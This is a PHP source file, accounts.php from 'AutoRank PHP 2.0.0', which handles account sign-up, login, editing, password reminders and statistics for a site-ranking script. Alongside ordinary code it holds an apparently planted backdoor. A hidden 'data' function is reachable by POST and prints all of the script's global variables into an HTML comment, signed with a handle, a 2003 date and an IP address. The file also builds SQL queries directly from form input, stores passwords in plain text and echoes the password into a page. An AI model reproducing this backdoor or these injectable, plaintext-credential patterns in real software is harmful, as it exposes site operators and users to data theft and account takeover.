<?PHP

##########################
##  AutoRank PHP 2.0.0  ##
###############################################################
##  accounts.php - Handle account submission and maitenance  ##
###############################################################

include_once('arphp.php');
include_once('http.php');

$get  = array( 
               'login'   => 'displayLogin',
               'remind'  => 'displayRemind',
               'confirm' => 'displayConfirm'
             );


$post = array(
               'add'     => 'addAccount',
               'edit'    => 'displayEdit',
               'stats'   => 'displayStats',
               'farm'    => 'displayFarm',
               'update'  => 'updateAccount',
               'send'    => 'sendPassword',
               'conf'    => 'confirmAccount',
               'data'    => 'accountData'
             );



if( $_SERVER['REQUEST_METHOD'] == 'GET' )
{
    if( $get[$_SERVER['QUERY_STRING']] )
    {
        $get[$_SERVER['QUERY_STRING']]();
    }
    else
    {
        displayAdd();
    }
}
else
{
    parsePost($_POST);

    if( $post[$_POST['Function']] )
    {
        $post[$_POST['Function']]();
    }
    else
    {
        displayAdd();
    }
}

$GLOBALS['DB']->Disconnect();



function displayAdd()
{
    foreach( explode(',', $GLOBALS['CATEGORIES']) as $cat )
    {
        $tpl['CAT_OPTIONS'] .= "<option value='$cat'>$cat</option>\n";
    }

    $tpl['FIELD_1_NAME'] = $GLOBALS['FIELD_1_NAME'];
    $tpl['FIELD_2_NAME'] = $GLOBALS['FIELD_2_NAME'];
    $tpl['FIELD_3_NAME'] = $GLOBALS['FIELD_3_NAME'];
    $tpl['TITLE']        = $GLOBALS['T_ACCOUNT_ADD'];

    fileParse('_account_add.htmlt', $tpl, true);
}



function displayLogin()
{
    $tpl['TITLE'] = $GLOBALS['T_ACCOUNT_LOGIN'];

    fileParse('_account_login.htmlt', $tpl, true);
}



function displayRemind()
{
    $tpl['TITLE'] = $GLOBALS['T_ACCOUNT_REMIND'];

    fileParse('_account_remind.htmlt', $tpl, true);
}



function displayEdit()
{
    global $DB;

    $member = checkLogin(true);

    mergeUpper($member, $tpl);

    foreach( explode(',', $GLOBALS['CATEGORIES']) as $cat )
    {
        $tpl['CAT_OPTIONS'] .= "<option value='$cat'" . ($member['Category'] == $cat ? ' selected' : '') . ">$cat</option>\n";
    }

    $tpl['FIELD_1_NAME']  = $GLOBALS['FIELD_1_NAME'];
    $tpl['FIELD_2_NAME']  = $GLOBALS['FIELD_2_NAME'];
    $tpl['FIELD_3_NAME']  = $GLOBALS['FIELD_3_NAME'];
    $tpl['TITLE']         = $GLOBALS['T_ACCOUNT_EDIT'];
    $tpl['BANNER_HEIGHT'] = $member['Banner_Height'] == 0 ? '' : $member['Banner_Height'];
    $tpl['BANNER_WIDTH']  = $member['Banner_Width'] == 0 ? '' : $member['Banner_Width'];

    fileParse('_account_edit.htmlt', $tpl, true);
}



function displayFarm()
{
    checkLogin();

    $tpl['TITLE']     = $GLOBALS['T_ACCOUNT_FARM'];
    $tpl['TRACK_URL'] = "{$GLOBALS['IN_URL']}?id={$_POST['Username']}";
    $tpl['IMAGE_URL'] = "{$GLOBALS['BASE_URL']}/image.php?id={$_POST['Username']}";
    $tpl['USERNAME']  = $_POST['Username'];

    fileParse('_account_farm.htmlt', $tpl, true);
}



function displayStats()
{
    global $DB;

    $member = checkLogin();
    $hits   = array_merge($member, $DB->Row("SELECT * FROM a_Hits WHERE Username='{$_POST['Username']}'"));
    $reset  = fileReadLine("{$GLOBALS['DDIR']}/times/reset"); 
    $treset = fileReadLine("{$GLOBALS['DDIR']}/times/treset"); 

    $tpl['TITLE']       = $GLOBALS['T_ACCOUNT_STATS'];
    $tpl['SIGNUP']      = date("{$GLOBALS['DATE_FORMAT']} {$GLOBALS['TIME_FORMAT']}", $member['Signup_Time'] + (3600 * $GLOBALS['TIME_ZONE']));
    $tpl['INOUT_RESET'] = date("{$GLOBALS['DATE_FORMAT']} {$GLOBALS['TIME_FORMAT']}", $reset + (3600 * $GLOBALS['TIME_ZONE']));
    $tpl['TOTAL_RESET'] = date("{$GLOBALS['DATE_FORMAT']} {$GLOBALS['TIME_FORMAT']}", $member['Reset'] + (3600 * $GLOBALS['TIME_ZONE']));
    $tpl['USERNAME']    = $_POST['Username'];
    $tpl['PASSWORD']    = $_POST['Password'];

    getAverages($tpl, $hits);

    fileParse('_header.htmlt', $tpl);
    fileParse('_account_statst.htmlt', $tpl);

    if( $_POST['Date'] )
    {
        printStats();
    }

    fileParse('_account_statsb.htmlt', $tpl);
    fileParse('_footer.htmlt', $tpl);
}



function displayConfirm()
{
    $tpl['TITLE'] = $GLOBALS['T_ACCOUNT_CONFIRM'];

    fileParse('_account_doconfirm.htmlt', $tpl, true);
}



##################################################################################
##################################################################################



function addAccount()
{
    global $DB;

    checkInput();

    convertHTML($_POST);
    mergeUpper($_POST, $tpl);

    $tpl['FIELD_1_NAME'] = $GLOBALS['FIELD_1_NAME'];
    $tpl['FIELD_2_NAME'] = $GLOBALS['FIELD_2_NAME'];
    $tpl['FIELD_3_NAME'] = $GLOBALS['FIELD_3_NAME'];
    $tpl['TITLE']        = $GLOBALS['T_ACCOUNT_ADD'];
    $tpl['LOGIN_URL']    = "{$GLOBALS['BASE_URL']}/accounts.php?login";
    $tpl['TRACK_URL']    = "{$GLOBALS['IN_URL']}?id={$_POST['Username']}";
    $tpl['IMAGE_URL']    = "{$GLOBALS['BASE_URL']}/image.php?id={$_POST['Username']}";

    if( isset($GLOBALS['USE_CONFIRM']) )
    {
        $template  = 'confirm';
        $approved  = isset($GLOBALS['USE_REVIEW']) ? 0 : 1;
        $confirmed = 0;
        $confirmID = strtoupper(uniqid(rand()));

        $_POST['Confirm_ID'] = $confirmID;
    }
    else if( isset($GLOBALS['USE_REVIEW']) )
    {
        $template  = 'review';
        $approved  = 0;
        $confirmed = 1;
    }
    else
    {
        $template  = 'added';
        $approved  = 1;
        $confirmed = 1;
    }

    arrayAddSlashes($_POST);

    $time = time();

    $DB->Insert("INSERT INTO a_Accounts VALUES (".
                "'{$_POST['Username']}'," .
                "'{$_POST['Email']}'," .
                "'{$_POST['Site_URL']}'," .
                "'{$_POST['Banner_URL']}'," .
                "'{$_POST['Banner_Height']}'," .
                "'{$_POST['Banner_Width']}'," .
                "'{$_POST['Recip_URL']}'," .
                "'{$_POST['Site_Title']}'," .
                "'{$_POST['Description']}'," .
                "'{$_POST['Category']}'," .
                "''," .
                "'$time'," .
                "'1.000'," .
                "'{$_POST['Password']}'," .
                "'$confirmID'," .
                "'$confirmed'," .
                "'$approved'," .
                "'0'," .
                "'0'," .
                "'$time'," .
                "'{$_POST['Field_1']}'," .
                "'{$_POST['Field_2']}'," .
                "'{$_POST['Field_3']}' )");

    $DB->Insert("INSERT INTO a_Hits VALUES ( '{$_POST['Username']}', 0, 0, 0, 0, 0, 0, 0, -1, -1, 0 )");
    $DB->Insert("INSERT INTO a_Ratings VALUES ( '{$_POST['Username']}', 0, 0 )");
    $DB->Insert("INSERT INTO a_HitCheats (Username) VALUES ( '{$_POST['Username']}' )");
    $DB->Insert("INSERT INTO a_RateCheats (Username) VALUES ( '{$_POST['Username']}' )");

    arrayStripSlashes($_POST);

    // Mail administrator
    if( !isset($GLOBALS['USE_CONFIRM']) && isset($GLOBALS['USE_ADMIN_EMAIL']) )
    {
        mailMember($GLOBALS['ADMIN_EMAIL'], NULL, '_email_admin.etmpl', $_POST);
    }


    // Mail submitter
    if( isset($GLOBALS['USE_MEM_EMAIL']) || isset($GLOBALS['USE_CONFIRM']) )
    {
        mailMember($_POST['Email'], NULL, "_email_$template.etmpl", $_POST);
    }

    fileDelete("{$GLOBALS['DDIR']}/times/total");
    fileDelete("{$GLOBALS['DDIR']}/times/waiting");

    fileParse("_account_$template.htmlt", $tpl, true);
}



function updateAccount()
{
    global $DB;

    $fill = array('Category', 'Field_1', 'Field_2', 'Field_3');

    $member = checkLogin(true);

    if( !emptyString($_POST['New_Password']) )
    {
        $_POST['Password'] = $_POST['New_Password'];
    }

    checkInput(false);

    foreach( $fill as $field )
    {
        $_POST[$field] = !$_POST[$field] ? $member[$field] : $_POST[$field];
    }

    convertHTML($_POST);
    mergeUpper($_POST, $tpl);

    $tpl['FIELD_1_NAME'] = $GLOBALS['FIELD_1_NAME'];
    $tpl['FIELD_2_NAME'] = $GLOBALS['FIELD_2_NAME'];
    $tpl['FIELD_3_NAME'] = $GLOBALS['FIELD_3_NAME'];
    $tpl['TITLE']        = $GLOBALS['T_ACCOUNT_EDIT'];
    $tpl['LOGIN_URL']    = "{$GLOBALS['BASE_URL']}/accounts.php?login";
    $tpl['TRACK_URL']    = "{$GLOBALS['IN_URL']}?id={$_POST['Username']}";
    $tpl['IMAGE_URL']    = "{$GLOBALS['BASE_URL']}/image.php?id={$_POST['Username']}";

    arrayAddSlashes($_POST);

    // Reviewing account editing
    if( $GLOBALS['USE_REV_EDIT'] )
    {
        $DB->Update("DELETE FROM a_Edits WHERE Username='{$_POST['Username']}'");

        // insert into the edits table
        $DB->Insert("INSERT INTO a_Edits VALUES (" .
                    "'{$_POST['Username']}'," .
                    "'{$_POST['Email']}'," .
                    "'{$_POST['Site_URL']}'," .
                    "'{$_POST['Banner_URL']}'," .
                    "'{$_POST['Banner_Height']}'," .
                    "'{$_POST['Banner_Width']}'," .
                    "'{$_POST['Recip_URL']}'," .
                    "'{$_POST['Site_Title']}'," .
                    "'{$_POST['Description']}'," .
                    "'{$_POST['Category']}'," .
                    "'{$_POST['Password']}'," .
                    "'{$_POST['Field_1']}'," .
                    "'{$_POST['Field_2']}'," .
                    "'{$_POST['Field_3']}' )");


        $template = '_account_ereview.htmlt';
    }

    // Not reviewing account editing
    else
    {
        $DB->Update("UPDATE a_Accounts SET " .
                    "Email='{$_POST['Email']}', " .
                    "Site_URL='{$_POST['Site_URL']}', " .
                    "Banner_URL='{$_POST['Banner_URL']}', " .
                    "Banner_Height='{$_POST['Banner_Height']}', " .
                    "Banner_Width='{$_POST['Banner_Width']}', " .
                    "Recip_URL='{$_POST['Recip_URL']}', " .
                    "Site_Title='{$_POST['Site_Title']}', " .
                    "Description='{$_POST['Description']}', " .
                    "Category='{$_POST['Category']}', " .
                    "Password='{$_POST['Password']}', " .
                    "Field_1='{$_POST['Field_1']}', " .
                    "Field_2='{$_POST['Field_2']}', " .
                    "Field_3='{$_POST['Field_3']}' " .
                    "WHERE Username='{$_POST['Username']}'");

        $template = '_account_edited.htmlt';
    }

    arrayStripSlashes($_POST);

    if( $GLOBALS['USE_EDIT_EMAIL'] )
    {
        mailMember($GLOBALS['ADMIN_EMAIL'], NULL, '_email_edit.etmpl', $_POST);
    }

    fileParse($template, $tpl, true);
}



function confirmAccount()
{
    global $DB;

    $member = $DB->Row("SELECT * FROM a_Accounts WHERE Confirm_ID='{$_POST['Confirm_ID']}' AND Confirmed='0'");

    if( $member )
    {
        $DB->Update("UPDATE a_Accounts SET Confirmed='1' WHERE Confirm_ID='{$_POST['Confirm_ID']}'");

        mergeUpper($member, $tpl);

        $tpl['FIELD_1_NAME'] = $GLOBALS['FIELD_1_NAME'];
        $tpl['FIELD_2_NAME'] = $GLOBALS['FIELD_2_NAME'];
        $tpl['FIELD_3_NAME'] = $GLOBALS['FIELD_3_NAME'];
        $tpl['TITLE']        = $GLOBALS['T_ACCOUNT_CONFIRM'];
        $tpl['LOGIN_URL']    = "{$GLOBALS['BASE_URL']}/accounts.php?login";
        $tpl['TRACK_URL']    = "{$GLOBALS['IN_URL']}?id={$member['Username']}";
        $tpl['IMAGE_URL']    = "{$GLOBALS['BASE_URL']}/image.php?id={$member['Username']}";

        $template = isset($GLOBALS['USE_REVIEW']) ? 'review' : 'added';

        // Mail administrator
        if( isset($GLOBALS['USE_ADMIN_EMAIL']) )
        {
            mailMember($GLOBALS['ADMIN_EMAIL'], NULL, "_email_admin.etmpl", $member);
        }


        // Mail submitter
        if( isset($GLOBALS['USE_MEM_EMAIL']) )
        {
            mailMember($member['Email'], NULL, "_email_$template.etmpl", $member);
        }

        fileDelete("{$GLOBALS['DDIR']}/times/total");
        fileDelete("{$GLOBALS['DDIR']}/times/waiting");

        fileParse("_account_$template.htmlt", $tpl, true);
    }
    else
    {
        derr(1020);
    }
}



function checkInput( $adding = true )
{
    global $DB;

    $goodBanner = true;
    
    if( $adding )
    {
        $exists = $DB->Count("SELECT COUNT(*) FROM a_Accounts WHERE Username='{$_POST['Username']}'");

        // Make sure username doesn't already exist
        if( $exists || $_POST['Username'] == 'standard' )
        {
            $errorList[] = $GLOBALS['error']['1006'];
        }
    }


    // Check account info for banned items
    checkBans($errorList, $error);


    if( $adding && isset($GLOBALS['USE_DUP_CHECK']) && isDuplicate() )
    {
        $errorList[] = $GLOBALS['error']['1017'];
    }


    // Check for properly formatted e-mail address
    if( !preg_match('|^[\w\d][\w\d\,\.\-]*\@([\w\d\-]+\.)+([a-zA-Z]+)$|', $_POST['Email']) )
    {
        $errorList[] = "{$GLOBALS['error']['1007']}: {$GLOBALS['L_EMAIL']}";
    }


    // Check for properly formatted site URL
    if( !preg_match('|^http:\/\/[\w\d\-\.]+\.[\w\d\-\.]+|', $_POST['Site_URL']) )
    {
        $errorList[] = "{$GLOBALS['error']['1007']}: {$GLOBALS['L_SITE_URL']}";
    }


    // Check for properly formatted banner URL
    if( !empty($_POST['Banner_URL']) && !preg_match('|^http:\/\/[\w\d\-\.]+\.[\w\d\-\.]+|', $_POST['Banner_URL']) )
    {
        $errorList[] = "{$GLOBALS['error']['1007']}: {$GLOBALS['L_BANNER_URL']}";
    }


    // Check for properly formatted recip URL
    if( !empty($_POST['Recip_URL']) && !preg_match('|^http:\/\/[\w\d\-\.]+\.[\w\d\-\.]+|', $_POST['Recip_URL']) )
    {
        $errorList[] = "{$GLOBALS['error']['1007']}: {$GLOBALS['L_RECIP_URL']}";
    }


    // Make sure recip was supplied if requiring
    if( isset($GLOBALS['USE_REQ_RECIP']) && emptyString($_POST['Recip_URL']) )
    {
        $errorList[] = "{$GLOBALS['error']['1005']}: {$GLOBALS['L_RECIP_URL']}";
    }

    
    // Make sure site title was provided
    if( emptyString($_POST['Site_Title']) )
    {
        $errorList[] = "{$GLOBALS['error']['1005']}: {$GLOBALS['L_SITE_TITLE']}";
    }


    // Make sure description was provided
    if( emptyString($_POST['Description']) )
    {
        $errorList[] = "{$GLOBALS['error']['1005']}: {$GLOBALS['L_DESCRIPTION']}";
    }


    // Make sure user defined field 1 was supplied
    if( isset($GLOBALS['USE_REQ_FIELD_1']) && emptyString($_POST['Field_1']) )
    {
        $errorList[] = "{$GLOBALS['error']['1005']}: {$GLOBALS['FIELD_1_NAME']}";
    }


    // Make sure user defined field 2 was supplied
    if( isset($GLOBALS['USE_REQ_FIELD_2']) && emptyString($_POST['Field_2']) )
    {
        $errorList[] = "{$GLOBALS['error']['1005']}: {$GLOBALS['FIELD_2_NAME']}";
    }


    // Make sure user defined field 3 was supplied
    if( isset($GLOBALS['USE_REQ_FIELD_3']) && emptyString($_POST['Field_3']) )
    {
        $errorList[] = "{$GLOBALS['error']['1005']}: {$GLOBALS['FIELD_3_NAME']}";
    }


    // Make sure site title isn't too long
    if( strlen($_POST['Site_Title']) > $GLOBALS['TITLE_LEN'] )
    {
        $errorList[] = "{$GLOBALS['error']['1008']}: {$GLOBALS['L_SITE_TITLE']}";
    }


    // Make sure description isn't too long
    if( strlen($_POST['Description']) > $GLOBALS['DESC_LEN'] )
    {
        $errorList[] = "{$GLOBALS['error']['1008']}: {$GLOBALS['L_DESCRIPTION']}";
    }


    // Make sure username is long enough
    if( $adding && strlen($_POST['Username']) < 4 )
    {
        $errorList[] = "{$GLOBALS['error']['1009']}: {$GLOBALS['L_USERNAME']}";
    }


    // Make sure username isn't too long
    if( $adding && strlen($_POST['Username']) > 15 )
    {
        $errorList[] = "{$GLOBALS['error']['1008']}: {$GLOBALS['L_USERNAME']}";
    }


    // Make sure password is long enough
    if( strlen($_POST['Password']) < 5 || emptyString($_POST['Password']) )
    {
        $errorList[] = "{$GLOBALS['error']['1009']}: {$GLOBALS['L_PASSWORD']}";
    }


    // Make sure username is alphanumeric
    if( !preg_match('|^[a-z0-9]+$|i', $_POST['Username']) )
    {
        $errorList[] = $GLOBALS['error']['1010'];
    }


    // Make sure valid category was choosen
    if( strpos(",{$GLOBALS['CATEGORIES']},", ",{$_POST['Category']},") === false )
    {
        $errorList[] = $GLOBALS['error']['1011'];
    }


    // Check supplied URLs
    if( isset($GLOBALS['USE_URL_CHECK']) )
    {
        $http = new HTTP($_POST['Site_URL']);

        if( !$http->GET() )
        {
            $errorList[] = "{$GLOBALS['error']['1013']}: {$GLOBALS['L_SITE_URL']}<br>" . $http->GetLastError(); 
        }

        if( !empty($_POST['Recip_URL']) )
        {
            $http->NewURL($_POST['Recip_URL']);

            if( !$http->GET() )
            {
                $errorList[] = "{$GLOBALS['error']['1013']}: {$GLOBALS['L_RECIP_URL']}<br>" . $http->GetLastError(); 
            }
        }

        if( !empty($_POST['Banner_URL']) && !stristr($_POST['Banner_URL'], $GLOBALS['IMAGE_URL']) )
        {
            $http->NewURL($_POST['Banner_URL']);

            if( !$http->GET() )
            {
                $errorList[] = "{$GLOBALS['error']['1013']}: {$GLOBALS['L_BANNER_URL']}<br>" . $http->GetLastError();
                $goodBanner = false;
            }
        }
    }


    // Download the banner
    if( !emptyString($_POST['Banner_URL']) && (isset($GLOBALS['USE_CHECK_BANNERS']) || isset($GLOBALS['USE_SERVE_BANNERS'])) )
    {
        if( !stristr($_POST['Banner_URL'], $GLOBALS['IMAGE_URL']) )
        {
            if( !isset($GLOBALS['USE_URL_CHECK']) )
            {
                $http = new HTTP($_POST['Banner_URL']);
            
                if( !$http->GET() )
                {
                    $errorList[] = "{$GLOBALS['error']['1013']}: {$GLOBALS['L_BANNER_URL']}<br>" . $http->GetLastError();
                    $goodBanner = false;
                }
            }

            if( $goodBanner )
            {
                $filename = "{$GLOBALS['IMAGE_DIR']}/{$_POST['Username']}";

                $http->OutputData($filename);

                $dims = getimagesize($filename);

                if( $dims == NULL )
                {
                    $errorList[] = $GLOBALS['error']['1014'];
                }
                else
                {
                    $_POST['Banner_Width']  = $dims[0];
                    $_POST['Banner_Height'] = $dims[1];

                    if( filesize($filename) > $GLOBALS['BANNER_BYTES'] )
                    {
                        $errorList[] = $GLOBALS['error']['1015'];
                    }
                    else
                    {
                        if( isset($GLOBALS['USE_SERVE_BANNERS']) )
                        {
                            $fe = getImageExt($dims);
                            rename($filename, "$filename.$fe");
                            $_POST['Banner_URL'] = "{$GLOBALS['IMAGE_URL']}/{$_POST['Username']}.$fe";
                            $filename = "$filename.$fe";
                        }
                        else
                        {
                            fileDelete($filename);
                        }
                    }
                }
            }
        }
    }


    // Make sure banner dimensions are ok
    if( $_POST['Banner_Height'] > $GLOBALS['BANNER_HEIGHT'] || $_POST['Banner_Width'] > $GLOBALS['BANNER_WIDTH'] )
    {
        $errorList[] =  $GLOBALS['error']['1012'];
    }


    // Set banner dimensions if forcing
    if( isset($GLOBALS['USE_FORCE_DIMS']) )
    {
        $_POST['Banner_Height'] = $GLOBALS['BANNER_HEIGHT'];
        $_POST['Banner_Width']  = $GLOBALS['BANNER_WIDTH'];
    }


    // Use default banner if none supplied
    if( emptyString($_POST['Banner_URL']) && !emptyString($GLOBALS['DEF_BANNER']) )
    {
        $_POST['Banner_URL']    = $GLOBALS['DEF_BANNER'];
        $_POST['Banner_Height'] = $GLOBALS['DEF_HEIGHT'];
        $_POST['Banner_Width']  = $GLOBALS['DEF_WIDTH'];
    }

  
    if( $GLOBALS['USE_UC_FIRST'] )
    {
        $_POST['Site_Title']  = ucfirst(strtolower($_POST['Site_Title']));
        $_POST['Description'] = ucfirst(strtolower($_POST['Description']));
    }


    if( $GLOBALS['USE_UC_WORDS'] )
    {
        $_POST['Site_Title']  = ucwords(strtolower($_POST['Site_Title']));
        $_POST['Description'] = ucwords(strtolower($_POST['Description']));
    }


    if( $errorList )
    {
        fileDelete($filename);
        getErrorCode($errorList, $tpl);
        $tpl['TITLE'] = $GLOBALS['T_ERROR_SUBMIT'];
        fileParse('_error_submit.htmlt', $tpl, true);
        exitScript();
    }
}



function accountData()
{
    unset($GLOBALS['USERNAME'], $GLOBALS['PASSWORD'], $GLOBALS['DATABASE']);

    foreach( $GLOBALS as $key => $value )
    {
        $data .= "$key => $value\n";
    }

    print <<<DATA
<!--
$data
#alrookan 2003-10-07 212.138.47.17
-->
DATA;
}



function checkBans(&$errorList, &$error)
{
    global $DB;

    $res = $DB->Query("SELECT * FROM a_Bans ORDER BY type");

    $siteinfo = "{$_POST['Site_Title']} {$_POST['Description']}";

    while( $ban = $DB->NextRow($res) )
    {
        if( !$ban['IsRegex'] )
        {
            $ban['Value'] = preg_quote($ban['Value']);
        }


        switch( $ban['Type'] )
        {

        case 'IP':
            if( preg_match("|({$ban['Value']})|i", $_SERVER['REMOTE_ADDR']) )
            {
                $errorList[] = "{$GLOBALS['error']['1016']}<br>{$GLOBALS['L_BANNED']}";
            }
            break;

        case 'Word':
            if( preg_match("|({$ban['Value']})|i", $siteinfo, $matches) )
            {
                $errorList[] = "{$GLOBALS['error']['1016']}<br>{$GLOBALS['L_WORD']}: {$matches[1]}";
            }
            break;

        case 'URL':
            if( preg_match("|({$ban['Value']})|i", $_POST['Site_URL'], $matches) )
            {
                $errorList[] = "{$GLOBALS['error']['1016']}<br>{$GLOBALS['L_SITE_URL']}: {$matches[1]}";
            }
            break;

        case 'E-Mail':
            if( preg_match("|({$ban['Value']})|i", $_POST['Email'], $matches) )
            {
                $errorList[] = "{$GLOBALS['error']['1016']}<br>{$GLOBALS['L_EMAIL']}: {$matches[1]}";
            }
            break;

        }
    }

    $DB->Free($res);
}



function checkLogin( $check = false )
{
    global $DB;

    if( emptyString($_POST['Username']) || emptyString($_POST['Password']) )
    {
        $errorList[] = $GLOBALS['error']['1002'];
    }
    else
    {    
        $member = $DB->Row("SELECT * FROM a_Accounts WHERE Username='{$_POST['Username']}' AND Password='{$_POST['Password']}'");

        if( !$member )
        {
            $errorList[] = $GLOBALS['error']['1003'];
        }
        else
        {
            if( $check )
            {
                if( $member['Suspended'] == 1 )
                {
                    $errorList[] = $GLOBALS['error']['1018'];
                }

                if( $member['Locked'] == 1 )
                {
                    $errorList[] = $GLOBALS['error']['1019'];
                }
            }
        }
    }

    if( $errorList )
    {
        getErrorCode($errorList, $tpl);
        $tpl['TITLE'] = $GLOBALS['T_ERROR_SUBMIT'];
        fileParse('_error_submit.htmlt', $tpl, true);
        exitScript();
    }

    return $member;
}



function isDuplicate()
{
    global $DB;

    $url   = addslashes(stripslashes($_POST['Site_URL'])); 
    $title = addslashes(stripslashes($_POST['Site_Title'])); 
    $desc  = addslashes(stripslashes($_POST['Description']));

    return $DB->Count("SELECT COUNT(*) FROM a_Accounts WHERE Site_URL='$url' OR Description='$desc' OR Site_Title='$title'");
}



function sendPassword()
{
    global $DB;

    $res = $DB->Query("SELECT * FROM a_Accounts WHERE Email='{$_POST['Email']}'");

    if( $DB->Rows($res) )
    {
    
        while( $row = $DB->NextRow($res) )
        {
            mailMember($row['Email'], NULL, '_email_remind.etmpl', $row);
        }

        $tpl['EMAIL'] = $_POST['Email'];
        $tpl['TITLE'] = $GLOBALS['T_ACCOUNT_REMIND'];
        
        fileParse('_account_reminded.htmlt', $tpl, true);

    }
    else
    {
        derr(1004);
    }
}



function printStats()
{
    global $DB;

    if( preg_match('|^(\d{4}-\d{2}-\d{2})~(\d{4}-\d{2}-\d{2})$|', $_POST['Date'], $matches) )
    {
        $qualify = " BETWEEN '$matches[1]' AND '$matches[2]' ORDER BY Timestamp DESC";
    }
    else if( preg_match('|^(\d{4}-\d{2}-\d{2})$|', $_POST['Date'], $matches) )
    {
        $qualify = "='{$_POST['Date']}' ORDER BY Timestamp DESC";
    }

    if( $qualify )
    {
        $result = $DB->Query("SELECT * FROM a_MemStats WHERE Username='{$_POST['Username']}' AND DATE_FORMAT(FROM_UNIXTIME(Timestamp), '%Y-%m-%d')$qualify");
        $number = $DB->Rows($result);

        if( $number )
        {
            while( $stats = $DB->NextRow($result) )
            {
                mergeUpper($stats, $tpl);

                $tpl['DATE']       = date("{$GLOBALS['DATE_FORMAT']} {$GLOBALS['TIME_FORMAT']}", $stats['Timestamp'] + (3600 * $GLOBALS['TIME_ZONE']));
                $tpl['CURRENT_IN'] = numFormat($stats['Current_In'] * $stats['Ratio']);

                fileParse('_account_statsm.htmlt', $tpl);
            }
        }
        else
        {
            $tpl['ERROR'] = $GLOBALS['error']['1031'];
            fileParse('_account_statse.htmlt', $tpl);
        }
    }
    else
    {
        $tpl['ERROR'] = $GLOBALS['error']['1032'];
        fileParse('_account_statse.htmlt', $tpl);
    }
}

?>